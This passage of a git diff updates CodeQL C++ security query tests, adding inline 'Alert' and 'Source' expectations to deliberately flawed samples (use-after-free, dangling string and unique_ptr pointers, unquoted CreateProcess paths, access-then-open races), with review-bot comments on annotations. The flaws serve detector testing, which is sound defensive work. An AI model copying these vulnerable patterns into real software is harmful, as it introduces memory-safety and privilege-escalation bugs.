// BAD + f = fopen(path, "wt"); // BAD // $ Alert // ... } @@ -294,7 +294,7 @@ void test4_1(const char *path) fclose(f); - chmod(path, 0); // BAD + chmod(path, 0); // BAD // $ Alert } } 
@@ -326,7 +326,7 @@ void test6_1(const char *path) if (access(path)) { - f = fopen(path, "r"); // BAD + f = fopen(path, "r"); // BAD // $ Alert // ... } @@ -352,7 +352,7 @@ void test6_3(const char *path) if (!access(path)) { - f = fopen(path, "r"); // BAD + f = fopen(path, "r"); // BAD // $ Alert // ... } @@ -366,7 +366,7 @@ void test6_4(const char *path) { // ... } else { - f = fopen(path, "r"); // BAD + f = fopen(path, "r"); // BAD // $ Alert // ... } @@ -397,7 +397,7 @@ void test7_1(const char *path) fclose(f); - chmod(path, 1234); // BAD + chmod(path, 1234); // BAD // $ Alert } } @@ -405,7 +405,7 @@ void test7_1(const char *path1, const char *path2) { if (!rename(path1, path2)) { - chmod(path2, 1234); // BAD + chmod(path2, 1234); // BAD // $ Alert } } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/IteratorToExpiredContainer/IteratorToExpiredContainer.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/IteratorToExpiredContainer/IteratorToExpiredContainer.qlref index fb2d78f87dfe..b0ce57b346f8 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/IteratorToExpiredContainer/IteratorToExpiredContainer.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/IteratorToExpiredContainer/IteratorToExpiredContainer.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-416/IteratorToExpiredContainer.ql +query: Security/CWE/CWE-416/IteratorToExpiredContainer.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/IteratorToExpiredContainer/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/IteratorToExpiredContainer/test.cpp index d4e3c5b269ae..fe30cb863a46 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/IteratorToExpiredContainer/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/IteratorToExpiredContainer/test.cpp 
@@ -677,10 +677,10 @@ std::vector> return_self_by_value(const std::vector& v) { } std::vector& ref_to_first_in_returnValue_1() { - return returnValue()[0]; // BAD + return returnValue()[0]; // BAD // $ Alert } std::vector& ref_to_first_in_returnValue_2() { @@ -732,7 +732,7 @@ std::vector& ref_to_first_in_returnValue_2() { } std::vector& ref_to_first_in_returnValue_3() { - return returnValue()[0]; // BAD + return returnValue()[0]; // BAD // $ Alert } std::vector first_in_returnValue_1() { @@ -854,7 +854,7 @@ struct PlusPlusReturnByValueIterator void test7() { PlusPlusReturnByValueIterator it; - it.operator++(); // GOOD [FALSE POSITIVE] + it.operator++(); // GOOD [FALSE POSITIVE] // $ Alert it.begin(); } \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.expected index b7decda26517..670caa2291c6 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.expected 
@@ -1,3 +1,18 @@ +#select +| test.cpp:41:6:41:9 | data | test.cpp:39:7:39:10 | pointer to free output argument | test.cpp:41:6:41:9 | data | Memory may have been previously freed by $@. | test.cpp:39:2:39:5 | call to free | call to free | +| test.cpp:79:7:79:10 | data | test.cpp:75:7:75:10 | pointer to free output argument | test.cpp:79:7:79:10 | data | Memory may have been previously freed by $@. | test.cpp:75:2:75:5 | call to free | call to free | +| test.cpp:108:6:108:9 | data | test.cpp:106:7:106:10 | pointer to free output argument | test.cpp:108:6:108:9 | data | Memory may have been previously freed by $@. | test.cpp:106:2:106:5 | call to free | call to free | +| test.cpp:119:6:119:9 | data | test.cpp:116:7:116:10 | pointer to free output argument | test.cpp:119:6:119:9 | data | Memory may have been previously freed by $@. | test.cpp:116:2:116:5 | call to free | call to free | +| test.cpp:130:6:130:9 | data | test.cpp:127:7:127:10 | pointer to free output argument | test.cpp:130:6:130:9 | data | Memory may have been previously freed by $@. | test.cpp:127:2:127:5 | call to free | call to free | +| test.cpp:165:2:165:2 | c | test.cpp:164:9:164:9 | pointer to operator delete output argument | test.cpp:165:2:165:2 | c | Memory may have been previously freed by $@. | test.cpp:164:2:164:10 | delete | delete | +| test.cpp:166:3:166:4 | * ... | test.cpp:164:9:164:9 | pointer to operator delete output argument | test.cpp:166:3:166:4 | * ... | Memory may have been previously freed by $@. | test.cpp:164:2:164:10 | delete | delete | +| test.cpp:186:6:186:9 | data | test.cpp:181:7:181:10 | pointer to free output argument | test.cpp:186:6:186:9 | data | Memory may have been previously freed by $@. | test.cpp:181:2:181:5 | call to free | call to free | +| test.cpp:197:6:197:9 | data | test.cpp:192:7:192:10 | pointer to free output argument | test.cpp:197:6:197:9 | data | Memory may have been previously freed by $@. 
| test.cpp:192:2:192:5 | call to free | call to free | +| test.cpp:209:6:209:9 | data | test.cpp:203:7:203:10 | pointer to free output argument | test.cpp:209:6:209:9 | data | Memory may have been previously freed by $@. | test.cpp:203:2:203:5 | call to free | call to free | +| test.cpp:209:6:209:9 | data | test.cpp:207:8:207:11 | pointer to free output argument | test.cpp:209:6:209:9 | data | Memory may have been previously freed by $@. | test.cpp:207:3:207:6 | call to free | call to free | +| test.cpp:217:6:217:6 | x | test.cpp:216:9:216:9 | pointer to operator delete output argument | test.cpp:217:6:217:6 | x | Memory may have been previously freed by $@. | test.cpp:216:2:216:9 | delete | delete | +| test.cpp:248:12:248:15 | data | test.cpp:243:7:243:16 | pointer to free output argument | test.cpp:248:12:248:15 | data | Memory may have been previously freed by $@. | test.cpp:243:2:243:5 | call to free | call to free | +| test.cpp:255:13:255:16 | data | test.cpp:250:7:250:17 | pointer to free output argument | test.cpp:255:13:255:16 | data | Memory may have been previously freed by $@. | test.cpp:250:2:250:5 | call to free | call to free | edges | test.cpp:39:7:39:10 | pointer to free output argument | test.cpp:41:6:41:9 | data | provenance | | | test.cpp:75:7:75:10 | pointer to free output argument | test.cpp:79:7:79:10 | data | provenance | | 
@@ -58,18 +73,3 @@ nodes | test.cpp:255:9:255:10 | *i2 [data] | semmle.label | *i2 [data] | | test.cpp:255:13:255:16 | data | semmle.label | data | subpaths -#select -| test.cpp:41:6:41:9 | data | test.cpp:39:7:39:10 | pointer to free output argument | test.cpp:41:6:41:9 | data | Memory may have been previously freed by $@. | test.cpp:39:2:39:5 | call to free | call to free | -| test.cpp:79:7:79:10 | data | test.cpp:75:7:75:10 | pointer to free output argument | test.cpp:79:7:79:10 | data | Memory may have been previously freed by $@. | test.cpp:75:2:75:5 | call to free | call to free | -| test.cpp:108:6:108:9 | data | test.cpp:106:7:106:10 | pointer to free output argument | test.cpp:108:6:108:9 | data | Memory may have been previously freed by $@. | test.cpp:106:2:106:5 | call to free | call to free | -| test.cpp:119:6:119:9 | data | test.cpp:116:7:116:10 | pointer to free output argument | test.cpp:119:6:119:9 | data | Memory may have been previously freed by $@. | test.cpp:116:2:116:5 | call to free | call to free | -| test.cpp:130:6:130:9 | data | test.cpp:127:7:127:10 | pointer to free output argument | test.cpp:130:6:130:9 | data | Memory may have been previously freed by $@. | test.cpp:127:2:127:5 | call to free | call to free | -| test.cpp:165:2:165:2 | c | test.cpp:164:9:164:9 | pointer to operator delete output argument | test.cpp:165:2:165:2 | c | Memory may have been previously freed by $@. | test.cpp:164:2:164:10 | delete | delete | -| test.cpp:166:3:166:4 | * ... | test.cpp:164:9:164:9 | pointer to operator delete output argument | test.cpp:166:3:166:4 | * ... | Memory may have been previously freed by $@. | test.cpp:164:2:164:10 | delete | delete | -| test.cpp:186:6:186:9 | data | test.cpp:181:7:181:10 | pointer to free output argument | test.cpp:186:6:186:9 | data | Memory may have been previously freed by $@. 
| test.cpp:181:2:181:5 | call to free | call to free | -| test.cpp:197:6:197:9 | data | test.cpp:192:7:192:10 | pointer to free output argument | test.cpp:197:6:197:9 | data | Memory may have been previously freed by $@. | test.cpp:192:2:192:5 | call to free | call to free | -| test.cpp:209:6:209:9 | data | test.cpp:203:7:203:10 | pointer to free output argument | test.cpp:209:6:209:9 | data | Memory may have been previously freed by $@. | test.cpp:203:2:203:5 | call to free | call to free | -| test.cpp:209:6:209:9 | data | test.cpp:207:8:207:11 | pointer to free output argument | test.cpp:209:6:209:9 | data | Memory may have been previously freed by $@. | test.cpp:207:3:207:6 | call to free | call to free | -| test.cpp:217:6:217:6 | x | test.cpp:216:9:216:9 | pointer to operator delete output argument | test.cpp:217:6:217:6 | x | Memory may have been previously freed by $@. | test.cpp:216:2:216:9 | delete | delete | -| test.cpp:248:12:248:15 | data | test.cpp:243:7:243:16 | pointer to free output argument | test.cpp:248:12:248:15 | data | Memory may have been previously freed by $@. | test.cpp:243:2:243:5 | call to free | call to free | -| test.cpp:255:13:255:16 | data | test.cpp:250:7:250:17 | pointer to free output argument | test.cpp:255:13:255:16 | data | Memory may have been previously freed by $@. | test.cpp:250:2:250:5 | call to free | call to free | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.qlref index c0ef8616cdc1..096090964894 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.qlref @@ -1 +1,2 @@ -Critical/UseAfterFree.ql +query: Critical/UseAfterFree.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/test.cpp index deac38663362..251b936cc11c 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/test.cpp @@ -36,9 +36,9 @@ void test1() char* data; data = (char *)malloc(100*sizeof(char)); use_if_nonzero(data); // GOOD - free(data); + free(data); // $ Source use_if_nonzero(data); // BAD [NOT DETECTED] - use(data); // BAD + use(data); // BAD // $ Alert } void test2() @@ -72,11 +72,11 @@ void test4() { char* data; data = (char *)malloc(100*sizeof(char)); - free(data); + free(data); // $ Source if (data) { use_if_nonzero(data); // BAD [NOT DETECTED] - use(data); // BAD + use(data); // BAD // $ Alert } } @@ -103,9 +103,9 @@ void test6() char *data, *data2; data = (char *)malloc(100*sizeof(char)); data2 = data; - free(data); + free(data); // $ Source use_if_nonzero(data2); // BAD [NOT DETECTED] - use(data); // BAD + use(data); // BAD // $ Alert } void test7() @@ -113,10 +113,10 @@ void test7() char *data, *data2; data = (char *)malloc(100*sizeof(char)); data2 = data; - free(data); + free(data); // $ Source data2 = NULL; use_if_nonzero(data); // BAD [NOT DETECTED] - use(data); // BAD + use(data); // BAD // $ Alert } void test8() @@ -124,10 +124,10 @@ void test8() char *data, *data2; data2 = (char *)malloc(100*sizeof(char)); data = data2; - free(data); + free(data); // $ Source data2 = NULL; use_if_nonzero(data); // BAD [NOT DETECTED] - use(data); // BAD + use(data); // BAD // $ Alert } void noReturnWrapper() { noReturn(); } @@ -161,9 +161,9 @@ class myClass void test11() { myClass* c = new myClass(); - delete(c); - c->myMethod(); // BAD - (*c).myMethod(); // BAD + delete(c); // $ Source + c->myMethod(); // BAD // $ Alert + (*c).myMethod(); // BAD // $ Alert } template T test() 
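Review bot: The `use_if_nonzero(data); // BAD [NOT DETECTED]` lines in the test1, test4, test6, test7 and test8 hunks get no annotation, so the use-after-free cases the query misses are still recorded only as free-text comments. Marking them `// $ MISSING: Alert` would let the inline expectations test track each known false negative and report it when the query starts catching it. `v3 = v2 >> 1; // BAD: v2 is not initialized [NOT DETECTED]` in the test21 hunk of the UninitializedLocal test.cpp is in the same position. Whether a `Source` tag has to accompany the MISSING marker depends on the postprocess query's output, which is not visible here.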
@@ -178,43 +178,43 @@ template T test() void test12(int count) { char* data = NULL; - free(data); + free(data); // $ Source for (int i = 0; i < count; i++) { data = NULL; } - use(data); // BAD + use(data); // BAD // $ Alert } void test13() { char* data = NULL; - free(data); + free(data); // $ Source for (int i = 0; i < 2; i++) { data = NULL; } - use(data); // GOOD [FALSE POSITIVE] + use(data); // GOOD [FALSE POSITIVE] // $ Alert } void test14() { char* data = NULL; - free(data); + free(data); // $ Source for (int i = 0; i < 2; i++) { data = NULL; - free(data); + free(data); // $ Source } - use(data); // BAD + use(data); // BAD // $ Alert } template T test15() { T* x; use(x); // GOOD - delete x; - use(x); // BAD [NOT DETECTED] + delete x; // $ Source + use(x); // BAD [NOT DETECTED] // $ Alert } void test15runner(void) { @@ -240,17 +240,17 @@ struct myStruct { }; void malloc_after_free(myStruct *s) { - free(s->i1.data); + free(s->i1.data); // $ Source s->i1.data = (char *)malloc(100*sizeof(char)); if (s->i1.data == 0) { return; } - use(s->i1.data); // GOOD [FALSE POSITIVE] + use(s->i1.data); // GOOD [FALSE POSITIVE] // $ Alert - free(s->i2->data); + free(s->i2->data); // $ Source s->i2->data = (char *)malloc(100*sizeof(char)); if (s->i2->data == 0) { return; } - use(s->i2->data); // GOOD [FALSE POSITIVE] + use(s->i2->data); // GOOD [FALSE POSITIVE] // $ Alert } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfStringAfterLifetimeEnds/UseOfStringAfterLifetimeEnds.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfStringAfterLifetimeEnds/UseOfStringAfterLifetimeEnds.qlref index a69a1a7f4e57..a367b49f59d6 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfStringAfterLifetimeEnds/UseOfStringAfterLifetimeEnds.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfStringAfterLifetimeEnds/UseOfStringAfterLifetimeEnds.qlref 
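Review bot: In test15 the comment on the second `use(x);` still says `BAD [NOT DETECTED]` although the line now carries `// $ Alert`, so the prose and the expectation contradict each other. The UseAfterFree.expected rows in this patch list test.cpp:217 with a source at test.cpp:216, which by this hunk's numbering are that `use(x)` and the `delete x;` before it, so the alert does appear to be reported. If so, the stale marker should go: `use(x); // BAD // $ Alert`.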
@@ -1,2 +1,2 @@ - -Security/CWE/CWE-416/UseOfStringAfterLifetimeEnds.ql \ No newline at end of file +query: Security/CWE/CWE-416/UseOfStringAfterLifetimeEnds.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfStringAfterLifetimeEnds/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfStringAfterLifetimeEnds/test.cpp index 4b3d934088d7..ebd098315a29 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfStringAfterLifetimeEnds/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfStringAfterLifetimeEnds/test.cpp @@ -162,11 +162,11 @@ void call_by_cref(const S&); void call(const char*); const char* test1(bool b1, bool b2) { - auto s1 = std::string("hello").c_str(); // BAD - auto s2 = b1 ? std::string("hello").c_str() : ""; // BAD - auto s3 = b2 ? "" : std::string("hello").c_str(); // BAD + auto s1 = std::string("hello").c_str(); // BAD // $ Alert + auto s2 = b1 ? std::string("hello").c_str() : ""; // BAD // $ Alert + auto s3 = b2 ? "" : std::string("hello").c_str(); // BAD // $ Alert const char* s4; - s4 = std::string("hello").c_str(); // BAD + s4 = std::string("hello").c_str(); // BAD // $ Alert call(std::string("hello").c_str()); // GOOD call(b1 ? std::string("hello").c_str() : ""); // GOOD 
@@ -175,24 +175,24 @@ const char* test1(bool b1, bool b2) { call_by_cref({ std::string("hello").c_str() }); // GOOD std::vector v1; - v1.push_back(std::string("hello").c_str()); // BAD + v1.push_back(std::string("hello").c_str()); // BAD // $ Alert std::vector v2; - v2.push_back({ std::string("hello").c_str() }); // BAD + v2.push_back({ std::string("hello").c_str() }); // BAD // $ Alert - S s5[] = { { std::string("hello").c_str() } }; // BAD + S s5[] = { { std::string("hello").c_str() } }; // BAD // $ Alert char c = std::string("hello").c_str()[0]; // GOOD - auto s6 = std::string("hello").data(); // BAD - auto s7 = b1 ? std::string("hello").data() : ""; // BAD - auto s8 = b2 ? "" : std::string("hello").data(); // BAD + auto s6 = std::string("hello").data(); // BAD // $ Alert + auto s7 = b1 ? std::string("hello").data() : ""; // BAD // $ Alert + auto s8 = b2 ? "" : std::string("hello").data(); // BAD // $ Alert char* s9; - s9 = std::string("hello").data(); // BAD + s9 = std::string("hello").data(); // BAD // $ Alert - const char* s13 = b1 ? std::string("hello").c_str() : s1; // BAD + const char* s13 = b1 ? std::string("hello").c_str() : s1; // BAD // $ Alert - return std::string("hello").c_str(); // BAD + return std::string("hello").c_str(); // BAD // $ Alert } void test2(bool b1, bool b2) { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfUniquePtrAfterLifetimeEnds/UseOfUniquePointerAfterLifetimeEnds.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfUniquePtrAfterLifetimeEnds/UseOfUniquePointerAfterLifetimeEnds.qlref index 4c613e5c5acc..c2d7ade08561 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfUniquePtrAfterLifetimeEnds/UseOfUniquePointerAfterLifetimeEnds.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfUniquePtrAfterLifetimeEnds/UseOfUniquePointerAfterLifetimeEnds.qlref 
@@ -1 +1,2 @@ -Security/CWE/CWE-416/UseOfUniquePointerAfterLifetimeEnds.ql \ No newline at end of file +query: Security/CWE/CWE-416/UseOfUniquePointerAfterLifetimeEnds.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfUniquePtrAfterLifetimeEnds/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfUniquePtrAfterLifetimeEnds/test.cpp index 18cc66b83675..f133f80206a1 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfUniquePtrAfterLifetimeEnds/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfUniquePtrAfterLifetimeEnds/test.cpp @@ -153,14 +153,14 @@ std::unique_ptr get_unique_ptr(); const S* test1(bool b1, bool b2) { auto s1 = *get_unique_ptr(); // GOOD - auto s1a = &*get_unique_ptr(); // BAD - auto s1b = get_unique_ptr().get(); // BAD + auto s1a = &*get_unique_ptr(); // BAD // $ Alert + auto s1b = get_unique_ptr().get(); // BAD // $ Alert auto s1c = get_unique_ptr()->s; // GOOD - auto s1d = &(get_unique_ptr()->s); // BAD - auto s2 = b1 ? get_unique_ptr().get() : nullptr; // BAD - auto s3 = b2 ? nullptr :get_unique_ptr().get(); // BAD + auto s1d = &(get_unique_ptr()->s); // BAD // $ Alert + auto s2 = b1 ? get_unique_ptr().get() : nullptr; // BAD // $ Alert + auto s3 = b2 ? nullptr :get_unique_ptr().get(); // BAD // $ Alert const S* s4; - s4 = get_unique_ptr().get(); // BAD + s4 = get_unique_ptr().get(); // BAD // $ Alert call(get_unique_ptr().get()); // GOOD call(b1 ? get_unique_ptr().get() : nullptr); // GOOD 
@@ -169,14 +169,14 @@ const S* test1(bool b1, bool b2) { call_by_ref(*get_unique_ptr()); // GOOD std::vector v1; - v1.push_back(get_unique_ptr().get()); // BAD + v1.push_back(get_unique_ptr().get()); // BAD // $ Alert - S* s5[] = { get_unique_ptr().get() }; // BAD + S* s5[] = { get_unique_ptr().get() }; // BAD // $ Alert S s6 = b1 ? *get_unique_ptr() : *get_unique_ptr(); // GOOD - S& s7 = b1 ? *get_unique_ptr() : *get_unique_ptr(); // BAD + S& s7 = b1 ? *get_unique_ptr() : *get_unique_ptr(); // BAD // $ Alert - return &*get_unique_ptr(); // BAD + return &*get_unique_ptr(); // BAD // $ Alert } void test2(bool b1, bool b2) { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-428/UnsafeCreateProcessCall.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-428/UnsafeCreateProcessCall.cpp index 547237c2bea7..cc314f35bc5a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-428/UnsafeCreateProcessCall.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-428/UnsafeCreateProcessCall.cpp @@ -100,31 +100,31 @@ void positiveTestCases() wchar_t* lpApplicationName = NULL; // CreateProcessA - CreateProcessA( //BUG + CreateProcessA( //BUG // $ Alert NULL, (char*)"C:\\Program Files\\MyApp", NULL, NULL, FALSE, 0, NULL, NULL, NULL, NULL); // CreateProcessW - CreateProcessW( //BUG + CreateProcessW( //BUG // $ Alert NULL, (wchar_t*)L"C:\\Program Files\\MyApp", NULL, NULL, FALSE, 0, NULL, NULL, NULL, NULL); // CreateProcess - CreateProcess( //BUG + CreateProcess( //BUG // $ Alert NULL, (wchar_t*)L"C:\\Program Files\\MyApp", NULL, NULL, FALSE, 0, NULL, NULL, NULL, NULL); // lpCommandLine as hardcoded variable - CreateProcess( //BUG + CreateProcess( //BUG // $ Alert NULL, (wchar_t*)lpCommandLine, NULL, NULL, FALSE, 0, NULL, NULL, NULL, NULL); // CreateProcessWithTokenW - CreateProcessWithTokenW( //BUG + CreateProcessWithTokenW( //BUG // $ Alert h, LOGON_WITH_PROFILE, NULL, 
@@ -132,7 +132,7 @@ void positiveTestCases() 0, NULL, NULL, NULL, NULL); // CreateProcessWithLogonW - CreateProcessWithLogonW( //BUG + CreateProcessWithLogonW( //BUG // $ Alert (const wchar_t*)L"UserName", (const wchar_t*)L"CONTOSO", (const wchar_t*)L"", @@ -142,21 +142,21 @@ void positiveTestCases() 0, NULL, NULL, NULL, NULL); // CreateProcessAsUserA - CreateProcessAsUserA( //BUG + CreateProcessAsUserA( //BUG // $ Alert h, NULL, (char*)"C:\\Program Files\\MyApp", NULL, NULL, FALSE, 0, NULL, NULL, NULL, NULL); // CreateProcessAsUserW - CreateProcessAsUserW( //BUG + CreateProcessAsUserW( //BUG // $ Alert h, NULL, (wchar_t*)L"C:\\Program Files\\MyApp", NULL, NULL, FALSE, 0, NULL, NULL, NULL, NULL); // CreateProcessAsUser - CreateProcessAsUser( //BUG + CreateProcessAsUser( //BUG // $ Alert h, NULL, (wchar_t*)L"C:\\Program Files\\MyApp", @@ -164,7 +164,7 @@ void positiveTestCases() // CreateProcess with a hardcoded variable for application Name (NULL) // Variation: tab instead of space - CreateProcess( //BUG + CreateProcess( //BUG // $ Alert lpApplicationName, (wchar_t*)L"C:\\Program\tFiles\\MyApp", NULL, NULL, FALSE, 0, NULL, NULL, NULL, NULL); @@ -173,7 +173,7 @@ void positiveTestCases() void PositiveTestCasesWithCmdLineParameter(wchar_t* lpCommandLine) { // lpCommandLine as variable - CreateProcess( //BUG - Depends on the caller + CreateProcess( //BUG - Depends on the caller // $ Alert NULL, lpCommandLine, NULL, NULL, FALSE, 0, NULL, NULL, NULL, NULL); @@ -206,7 +206,7 @@ void PositiveTestCasesWithAppNameParameter(wchar_t* lpApplicationName) { void* h = 0; - CreateProcessWithTokenW( //BUG - Depends on the caller. In this case the caller sends NULL + CreateProcessWithTokenW( //BUG - Depends on the caller. In this case the caller sends NULL // $ Alert h, LOGON_WITH_PROFILE, lpApplicationName, 
@@ -255,7 +255,7 @@ void TestCaseProbablyBug() lpApplicationName = (const wchar_t*)L"app.exe"; } - CreateProcessWithLogonW( // BUG (Probably - depends on a condition that may be false) + CreateProcessWithLogonW( // BUG (Probably - depends on a condition that may be false) // $ Alert (const wchar_t*)L"UserName", (const wchar_t*)L"CONTOSO", (const wchar_t*)L"", diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-428/UnsafeCreateProcessCall.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-428/UnsafeCreateProcessCall.qlref index f2012f0c678d..75d4eecadc1d 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-428/UnsafeCreateProcessCall.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-428/UnsafeCreateProcessCall.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-428/UnsafeCreateProcessCall.ql \ No newline at end of file +query: Security/CWE/CWE-428/UnsafeCreateProcessCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/ConditionallyUninitializedVariable.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/ConditionallyUninitializedVariable.qlref index 5150d627257c..81d04da795eb 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/ConditionallyUninitializedVariable.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/ConditionallyUninitializedVariable.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-457/ConditionallyUninitializedVariable.ql +query: Security/CWE/CWE-457/ConditionallyUninitializedVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/examples.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/examples.cpp index ccb15904d025..b895621db06e 100644 
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/examples.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/examples.cpp @@ -35,7 +35,7 @@ void notifyGood(int deviceNumber) { int notifyBad(int deviceNumber) { DeviceConfig config; - initDeviceConfig(&config, deviceNumber); + initDeviceConfig(&config, deviceNumber); // $ Alert // BAD: Using config without checking the status code that is returned if (config.isEnabled) { notifyChannel(config.channel); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/test.cpp index a3c9b0a24aaa..46b9cbf8b3e7 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/ConditionallyUninitializedVariable/test.cpp @@ -19,7 +19,7 @@ void test1() int a, b, c, d, e, f; int result1, result2; - maybeInitialize1(&a); // BAD (initialization not checked) + maybeInitialize1(&a); // BAD (initialization not checked) // $ Alert use(a); if (maybeInitialize1(&b) == 1) // GOOD @@ -65,7 +65,7 @@ void test2() { int a, b; - maybeInitialize2(&a); // BAD (initialization not checked) + maybeInitialize2(&a); // BAD (initialization not checked) // $ Alert use(a); if (maybeInitialize2(&b)) // GOOD diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.expected index 6773f5aef942..d35519d860fb 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.expected 
@@ -1,3 +1,18 @@ +#select +| errors.cpp:14:18:14:18 | x | errors.cpp:13:7:13:7 | definition of x | errors.cpp:13:7:13:7 | definition of x | The variable $@ may not be initialized at this access. | errors.cpp:13:7:13:7 | x | x | +| test.cpp:12:6:12:8 | foo | test.cpp:11:6:11:8 | definition of foo | test.cpp:11:6:11:8 | definition of foo | The variable $@ may not be initialized at this access. | test.cpp:11:6:11:8 | foo | foo | +| test.cpp:113:6:113:8 | foo | test.cpp:111:6:111:8 | definition of foo | test.cpp:111:6:111:8 | definition of foo | The variable $@ may not be initialized at this access. | test.cpp:111:6:111:8 | foo | foo | +| test.cpp:227:3:227:3 | x | test.cpp:226:7:226:7 | definition of x | test.cpp:226:7:226:7 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:226:7:226:7 | x | x | +| test.cpp:251:13:251:13 | i | test.cpp:249:6:249:6 | definition of i | test.cpp:249:6:249:6 | definition of i | The variable $@ may not be initialized at this access. | test.cpp:249:6:249:6 | i | i | +| test.cpp:344:10:344:10 | a | test.cpp:341:7:341:7 | definition of a | test.cpp:341:7:341:7 | definition of a | The variable $@ may not be initialized at this access. | test.cpp:341:7:341:7 | a | a | +| test.cpp:377:10:377:10 | a | test.cpp:366:7:366:7 | definition of a | test.cpp:366:7:366:7 | definition of a | The variable $@ may not be initialized at this access. | test.cpp:366:7:366:7 | a | a | +| test.cpp:386:9:386:11 | val | test.cpp:367:6:367:8 | definition of val | test.cpp:367:6:367:8 | definition of val | The variable $@ may not be initialized at this access. | test.cpp:367:6:367:8 | val | val | +| test.cpp:425:10:425:10 | j | test.cpp:422:9:422:9 | definition of j | 